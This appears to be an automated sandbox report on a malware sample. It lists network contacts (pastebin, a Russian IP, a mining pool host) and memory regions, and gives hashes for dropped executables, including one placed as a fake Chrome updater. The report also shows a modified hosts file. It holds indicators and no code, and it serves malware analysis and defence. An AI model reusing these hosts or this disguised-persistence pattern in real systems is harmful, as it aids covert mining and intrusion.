US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:80 pastebin.com tcp
US 104.20.68.143:443 pastebin.com tcp
RU 46.29.235.84:80 46.29.235.84 tcp
US 8.8.8.8:53 143.68.20.104.in-addr.arpa udp
US 8.8.8.8:53 84.235.29.46.in-addr.arpa udp
NL 216.58.214.14:443 youtube.com tcp
NL 142.251.36.54:443 i.ytimg.com tcp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com udp
NL 142.251.36.14:443 play.google.com udp
NL 142.251.36.14:443 play.google.com udp
GB 216.58.208.98:443 googleads.g.doubleclick.net tcp
GB 216.58.208.98:443 googleads.g.doubleclick.net udp
NL 142.251.36.54:443 i.ytimg.com udp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com udp
US 8.8.8.8:53 86.8.109.52.in-addr.arpa udp
US 8.8.8.8:53 stratum-eu.rplant.xyz udp
FR 141.94.192.217:17056 stratum-eu.rplant.xyz tcp
US 8.8.8.8:53 217.192.94.141.in-addr.arpa udp
N/A 127.0.0.1:43317 tcp
N/A 127.0.0.1:43317 tcp
N/A 127.0.0.1:43317 tcp
N/A 127.0.0.1:43317 tcp
US 8.8.8.8:53 84.65.42.20.in-addr.arpa udp

Files

memory/1484-133-0x0000000000950000-0x0000000000984000-memory.dmp

memory/1484-134-0x0000000074BD0000-0x0000000075380000-memory.dmp

memory/1484-135-0x0000000005A10000-0x0000000006028000-memory.dmp

memory/1484-136-0x0000000005500000-0x000000000560A000-memory.dmp

memory/1484-138-0x0000000002C80000-0x0000000002C90000-memory.dmp

memory/1484-137-0x0000000005420000-0x0000000005432000-memory.dmp

memory/1484-139-0x0000000005480000-0x00000000054BC000-memory.dmp

memory/1484-140-0x0000000005790000-0x0000000005806000-memory.dmp

memory/1484-141-0x00000000058B0000-0x0000000005942000-memory.dmp

memory/1484-142-0x0000000006AD0000-0x0000000007074000-memory.dmp

memory/1484-143-0x0000000005950000-0x00000000059B6000-memory.dmp

memory/1484-144-0x0000000074BD0000-0x0000000075380000-memory.dmp

memory/1484-145-0x0000000002C80000-0x0000000002C90000-memory.dmp

memory/1484-146-0x00000000068F0000-0x0000000006AB2000-memory.dmp

memory/1484-147-0x0000000008CA0000-0x00000000091CC000-memory.dmp

memory/1484-148-0x0000000006880000-0x00000000068D0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/116-169-0x00007FF610870000-0x00007FF611A96000-memory.dmp

memory/116-170-0x00007FF610870000-0x00007FF611A96000-memory.dmp

memory/116-171-0x00007FFAEB4B0000-0x00007FFAEB6A5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/3816-180-0x0000000000300000-0x000000000058B000-memory.dmp

memory/116-181-0x00007FF610870000-0x00007FF611A96000-memory.dmp

memory/116-182-0x00007FF610870000-0x00007FF611A96000-memory.dmp

memory/116-183-0x00007FF610870000-0x00007FF611A96000-memory.dmp

memory/116-184-0x00007FF610870000-0x00007FF611A96000-memory.dmp

memory/116-185-0x00007FF610870000-0x00007FF611A96000-memory.dmp

memory/3816-186-0x0000000000300000-0x000000000058B000-memory.dmp

memory/4728-187-0x0000000000900000-0x0000000000A27000-memory.dmp

memory/4728-194-0x0000000000900000-0x0000000000A27000-memory.dmp

memory/4728-196-0x00000000FF250000-0x00000000FF260000-memory.dmp

memory/4728-195-0x00000000FF250000-0x00000000FF260000-memory.dmp

memory/4728-197-0x00000000FF250000-0x00000000FF260000-memory.dmp

memory/3816-199-0x0000000000300000-0x000000000058B000-memory.dmp

memory/4728-201-0x00000000FF250000-0x00000000FF260000-memory.dmp

memory/4728-200-0x00000000FF250000-0x00000000FF260000-memory.dmp

memory/4728-198-0x00000000FF250000-0x00000000FF260000-memory.dmp

memory/4728-203-0x00000000FF250000-0x00000000FF260000-memory.dmp

memory/4728-207-0x00000000FF250000-0x00000000FF260000-memory.dmp

memory/116-204-0x00007FF610870000-0x00007FF611A96000-memory.dmp

memory/4728-211-0x00000000FF250000-0x00000000FF260000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

memory/376-215-0x00000000004B0000-0x0000000000AE4000-memory.dmp

memory/4728-216-0x00000000FF250000-0x00000000FF260000-memory.dmp

memory/4728-217-0x00000000FF250000-0x00000000FF260000-memory.dmp

memory/4728-214-0x00000000FF250000-0x00000000FF260000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

memory/4728-208-0x00000000FF250000-0x00000000FF260000-memory.dmp

memory/4728-219-0x00000000FF250000-0x00000000FF260000-memory.dmp

memory/4728-222-0x00000000FF250000-0x00000000FF260000-memory.dmp

memory/4728-225-0x00000000FF250000-0x00000000FF260000-memory.dmp

memory/4728-226-0x00000000FF250000-0x00000000FF260000-memory.dmp

memory/4728-227-0x00000000FF250000-0x00000000FF260000-memory.dmp

memory/4728-228-0x00000000FF250000-0x00000000FF260000-memory.dmp

memory/4728-229-0x00000000FF250000-0x00000000FF260000-memory.dmp

memory/4728-231-0x00000000FF250000-0x00000000FF260000-memory.dmp

memory/376-230-0x00000000030F0000-0x0000000003160000-memory.dmp

memory/1484-224-0x0000000074BD0000-0x0000000075380000-memory.dmp

memory/376-223-0x00000000776E4000-0x00000000776E6000-memory.dmp

memory/116-233-0x00007FFAEB4B0000-0x00007FFAEB6A5000-memory.dmp

memory/4728-232-0x00000000FF250000-0x00000000FF260000-memory.dmp

memory/4728-234-0x00000000FF250000-0x00000000FF260000-memory.dmp

memory/376-221-0x00000000004B0000-0x0000000000AE4000-memory.dmp

memory/4728-218-0x00000000FF250000-0x00000000FF260000-memory.dmp

memory/4728-237-0x00000000FF250000-0x00000000FF260000-memory.dmp

memory/376-238-0x0000000005DD0000-0x0000000005DF2000-memory.dmp

memory/4728-241-0x00000000FF250000-0x00000000FF260000-memory.dmp

memory/4728-240-0x00000000FF250000-0x00000000FF260000-memory.dmp

memory/4728-242-0x00000000FF250000-0x00000000FF260000-memory.dmp

memory/4728-243-0x00000000FF250000-0x00000000FF260000-memory.dmp

memory/4728-245-0x00000000FF250000-0x00000000FF260000-memory.dmp

memory/4728-244-0x00000000FF250000-0x00000000FF260000-memory.dmp

memory/4728-247-0x00000000FF250000-0x00000000FF260000-memory.dmp

memory/4728-248-0x00000000FF250000-0x00000000FF260000-memory.dmp

memory/4728-246-0x00000000FF250000-0x00000000FF260000-memory.dmp

memory/376-239-0x00000000037E0000-0x00000000037F0000-memory.dmp

memory/376-236-0x00000000747E0000-0x0000000074F90000-memory.dmp

memory/4728-235-0x00000000FF250000-0x00000000FF260000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\CrashpadMetrics-active.pma

MD5 03c4f648043a88675a920425d824e1b3
SHA1 b98ce64ab5f7a187d19deb8f24ca4ab5d9720a6d
SHA256 f91dbb7c64b4582f529c968c480d2dce1c8727390482f31e4355a27bb3d9b450
SHA512 2473f21cf8747ec981db18fb42726c767bbcca8dd89fd05ffd2d844206a6e86da672967462ac714e6fb43cc84ac35fffcec7ddc43a9357c1f8ed9d14105e9192

memory/4728-284-0x00000000FF250000-0x00000000FF260000-memory.dmp

memory/4728-285-0x00000000FF250000-0x00000000FF260000-memory.dmp

memory/4728-286-0x00000000FF250000-0x00000000FF260000-memory.dmp

memory/4728-287-0x00000000FF250000-0x00000000FF260000-memory.dmp

memory/4728-288-0x00000000FF250000-0x00000000FF260000-memory.dmp

memory/4728-289-0x00000000FF250000-0x00000000FF260000-memory.dmp

memory/4728-290-0x00000000FF250000-0x00000000FF260000-memory.dmp

memory/4728-291-0x00000000FF250000-0x00000000FF260000-memory.dmp

memory/4728-293-0x00000000FF250000-0x00000000FF260000-memory.dmp

memory/4728-292-0x00000000FF250000-0x00000000FF260000-memory.dmp

memory/4728-294-0x00000000FF250000-0x00000000FF260000-memory.dmp

memory/4728-283-0x00000000FF250000-0x00000000FF260000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Local State

MD5 b4ae9281284bdede5b05a12a6b0c61b9
SHA1 e92f5b506bc500e57b41ee2ecb56a1d856cf0074
SHA256 55630cde7be4ccd4f2194178a4b1bf457f04866fe9e3a9f1064df2b790696642
SHA512 8d274c381c92d6d8c9f4e754bc08694abe58a8741490f10f0f4df89ace8eac0168a3c2192bcbb53c090c5fe5ace6eaba436b206cf20da75399686e289e3775f2

\??\pipe\crashpad_5060_CKALUUFCPABLSZEU

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Network\TransportSecurity

MD5 1084638092cde14771377bbe77f73145
SHA1 125ff80fb93c7c49623eb44d28ad1f61f5bf7c1f
SHA256 658894b7554e27d73d42bb9bd038003e648c6a3831676bc506350fef0522af26
SHA512 37cb2a8a695deb59c46c82c91162f7cf958203b507388aaf696a2956d421ed97ce6be3649cf643b73fcc27c3d018c86ce9946d53b0ed7f7ad97e02f2fe4af5c6

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Network\Reporting and NEL

MD5 388629b29d78869c4458601a681768f3
SHA1 d15d9750c1197384b19f50671f6284bbb82dcf3c
SHA256 222b928508718e0697e598e85f6533e96bc5d2662c44d649306ff774649dc467
SHA512 05331a5e54cf10945e5b39f1b4828b73cc968f290b86a9de5b3683d029db497f11073217e1c0f01de20c190de2eb702f509ca77d177f82a38ba67ee00ca67f40

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Network\Network Persistent State

MD5 11e7ba2b160f8dfd76e6515cde5a0974
SHA1 b9e57c194c805588e93e2a3617f4b2c27a45c3d4
SHA256 fd7ad4d0ee897c1948216e8a0ca604e50034ef4484bcb7da991a6655532079c7
SHA512 c4a525d7b678e4724c1a4fd2f86ed5b58548aeafb3c31a0934f0770ebe0951cf8a2124bbd12ec7205ea7f76f52a5b2125a6db0cb1ac619f3a785dfd732be7060

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Network\Cookies

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Local Storage\leveldb\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Local Storage\leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Local Storage\leveldb\LOG

MD5 f530a006a1861be4947830987360680d
SHA1 6fd38a8a395cf1dabd7f5aa21182be5a4ec0521e
SHA256 0ab80db5e3e60d5e14acd062f8b2d67924777e05ca08e62917db2102e170e361
SHA512 25057b03a46bdcf766b5057dd42348ae0690fb8b30ce443ba7ceec140b5ec92ea894a532055f16d4125c7e441468dd13592a5ea046776b90df8e500195080460

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Local Storage\leveldb\LOG.old

MD5 6ef06bc7572d4620082ed43ea96d5710
SHA1 a9a223aca2c0750796980276fcbe8147e0c5e9da
SHA256 d227cef804785aba0b73e14e5718dadaef80a243874455abfbec81edc4e47736
SHA512 2b141e48f1dc56d9e74387b520f36a31f8058bff24b34eca4b4c4ef22b3c492a4bcb80dc0b38dbce82861fa4d499f74b0b765b192e765810ea95e4b74979aec3

memory/4728-342-0x00000000776E2000-0x00000000776E3000-memory.dmp

memory/376-352-0x00000000004B0000-0x0000000000AE4000-memory.dmp

memory/3544-385-0x000001CFBEF40000-0x000001CFBEF62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0m1wftud.qjq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3544-390-0x00007FFAC8F00000-0x00007FFAC99C1000-memory.dmp

memory/3544-392-0x000001CFBEEC0000-0x000001CFBEED0000-memory.dmp

memory/3544-391-0x000001CFBEEC0000-0x000001CFBEED0000-memory.dmp

memory/3544-397-0x00007FFAC8F00000-0x00007FFAC99C1000-memory.dmp

memory/376-396-0x00000000747E0000-0x0000000074F90000-memory.dmp

memory/376-398-0x00000000037E0000-0x00000000037F0000-memory.dmp

C:\Windows\system32\drivers\etc\hosts

MD5 2d29fd3ae57f422e2b2121141dc82253
SHA1 c2464c857779c0ab4f5e766f5028fcc651a6c6b7
SHA256 80a60d7ec533d820de20bcedeb41319e7b1def548b6ea73ddbd69455bac4e7a4
SHA512 077a5c554663be7b71f181d961f5c98c732bc296dc015ffee30768a648bee3aad62c39c352cf2947432be19519906aeac7dfaf2557d309bb460732abb7fdbc68

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 440cb38dbee06645cc8b74d51f6e5f71
SHA1 d7e61da91dc4502e9ae83281b88c1e48584edb7c
SHA256 8ef7a682dfd99ff5b7e9de0e1be43f0016d68695a43c33c028af2635cc15ecfe
SHA512 3aab19578535e6ba0f6beb5690c87d970292100704209d2dcebddcdd46c6bead27588ef5d98729bfd50606a54cc1edf608b3d15bef42c13b9982aaaf15de7fd6

memory/1712-412-0x0000025E5A0C0000-0x0000025E5A0D0000-memory.dmp

memory/1712-413-0x0000025E5A0C0000-0x0000025E5A0D0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4a154efa7af25bb8b94d0d9c7b4f15cd
SHA1 5e0e04103e4eef1bc7ef242b730aed1958f98e1f
SHA256 c216eda372556eb78e680bde247c2fd2085642ee33031905a213c6bec502ccce
SHA512 fc4678133318fe1952947be74e244246336c7faacc9b9ae32336d57b106ec8f044e5db41dd98e8f3a54270ddacab2fc84a66d5d67deeadc3056ea5213bcbbba4

memory/1712-411-0x00007FFAC8FB0000-0x00007FFAC9A71000-memory.dmp

memory/1712-416-0x0000025E5A0C0000-0x0000025E5A0D0000-memory.dmp

memory/1712-426-0x00007FFAC8FB0000-0x00007FFAC9A71000-memory.dmp

memory/116-429-0x00007FF610870000-0x00007FF611A96000-memory.dmp

memory/116-430-0x00007FFAEB4B0000-0x00007FFAEB6A5000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/1508-433-0x00007FF7239B0000-0x00007FF724BD6000-memory.dmp

memory/1508-434-0x00007FFAEB4B0000-0x00007FFAEB6A5000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\000001.dbtmp

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 ed7bf12e02608720c6c1530964afc382
SHA1 14819f95a94d0602e40fa606a85f5a004e55d49c
SHA256 396bcd2d52f576ec0db8a0a121d7130e36d30c4bb581ab98b5a36f831ea0872a
SHA512 814c36677929627f57c2613f7830e821555df395e8836341fa7ef793efa1417648113b374999197d86794238a6243980aee0e83c7ac19c2117c41231c6a1381f

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 d4251910a3e2a303ab9a85ed9b61a445
SHA1 655c024add02c13581efddbedec622d5f148bf08
SHA256 6d0ea29a5bdd8c63d1889ed64f8ac291df78b9526d20c9c53aa5c3cb4159052f
SHA512 f04f4c7b713620849feed486e1076afa7f84a2d05d94de62531030031a51ed09a643099fe6c5cd0fe7d8869b502390589a23945762f62b23d500fdc8ae1b4084

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe58773e.TMP

MD5 e613965c5ff713c9fb14153c67cf9a60
SHA1 65e5ead5c69d60139e14cf511114c05d863c93f9
SHA256 b3f56eb3146a4e23e0e3ee34b5fadce745c9d0ed60033cadd4ba923ff893074e
SHA512 416611fb8194fdde916f783be1a31b834163862d4d0a861b92b230abe51bbc855e99765882b36f9a795c8f297be1a19646cad19f9444e6e6db8414d6c2cb7a2e

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Service Worker\ScriptCache\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Service Worker\Database\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Code Cache\js\index-dir\the-real-index

MD5 a3da0ed0c4686f4faf5f83c9f33b3eb2
SHA1 772d74520bfed9e419f732a1e6d0fa9c5b2af50d
SHA256 5f824419b1d97c2d05e5b10feb30b5a02c6aff9f81c6b336ed11a001aa193cda
SHA512 c3679fd17ec7a523b31ff1fcf2c410ef604b8a5fab34a8116bcdab1bb9b1087d916dee056ef9477d78696c683fd2c80e26186416574f078cf9f24409e1fea660

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\c923d8d5-769b-4ba8-9718-b5b74a345965\index-dir\the-real-index~RFe5881fc.TMP

MD5 8541224e4551925be86d09c7541e1ab2
SHA1 9558066097444eb40c99e6d83279345e14411839
SHA256 791e6ebf215c84c74fb6835c2f88b20a367f151195193fddaf8f5adc158e4b94
SHA512 fa60d626b64aede8ec968772c90082c22e3fb6a69a8d8cc8b118e4a7a882731f179590cf08b068495aa166b7de12cc1a2853052bbfb790b287036db16db6af37

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 9f2ae49f90070f38889e116b76594a57
SHA1 6c085696942bd5801d4f429f77c40b547969b639
SHA256 7bf2ea678c05391fe84ed6bde54c8c5cbc9f9aba690ab0c446c74dee3dca7702
SHA512 eccf8c4a611c64c306685d7c0388bac6635e089f9b4e9e9161b7a50cc3d9f7e212575cc749f1de99748c63a63330d710d72372bc0bc600a553fbef0c6bca5d53

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\c923d8d5-769b-4ba8-9718-b5b74a345965\index-dir\the-real-index

MD5 16e356e7d08f70f5691657785578bfae
SHA1 a71dd93847537ddf899e2505bfa504159e70dd34
SHA256 79f71c9e98e00d251cb62f8a5037dedb57f0b47dc5a9b7ac41365c49d61a9f1f
SHA512 9ce866471e691e266f46594ee063d6b9bb74d725e9e2f1ad6fdd5cb0a424855be02ed4b27a820f87bf45c990056fc19d92e40403ed8c48461dc675d8ce4606d1

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 9f22c6cab41a36531f644a08fc825778
SHA1 276f510e5bb49b32b8fb92a03f9ff8320e6d5be3
SHA256 93972d825800f479eea22e44139f392b80219ad229f9c7c5c4a6289d9529fbcc
SHA512 fda5d06aa13af95bfc25fc99a0b64b3dbb54e742451aac17f6e801e6aac41252928915bfa3cd8798716948ec95ce97b57c91946d6f68b11793b52ea6b7ff827a

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5881be.TMP

MD5 ea31f1861cb50e54275434881ed0ca65
SHA1 f63e3e711afc55bc017ec729bbad78a8d7745811
SHA256 ab08156aa7403fe45275bc0035aec36ecf576e4155c94e54141fa53146f396b5
SHA512 deea9703f9456497f31d48d229b62aeabc28706acef31eed38418f38f970b3f7055db07f8b6fa0ca0aa794fd6cf4c0982ca4a4039ac5fa2968f1daef3cb4ee7b

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Code Cache\js\index-dir\the-real-index

MD5 2acdd651ba99d1617a232b4204a0156d
SHA1 a9e1c287c98bfebf5b1ed5eb580066445b5e6f2d
SHA256 bd8470f8417124b10d82335f7cd9c1888424898e65fe2d1fe2090b728879640c
SHA512 c2b85f46bb05add24a6b09ee7a3af322fd890d594a8da7d6092e36e63dd7dcfaac78566e080226c42f94a2ed573a70657b9505d3ce185de9a1a7513bab4706a5

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\GPUCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\DawnCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\DawnCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\GPUCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
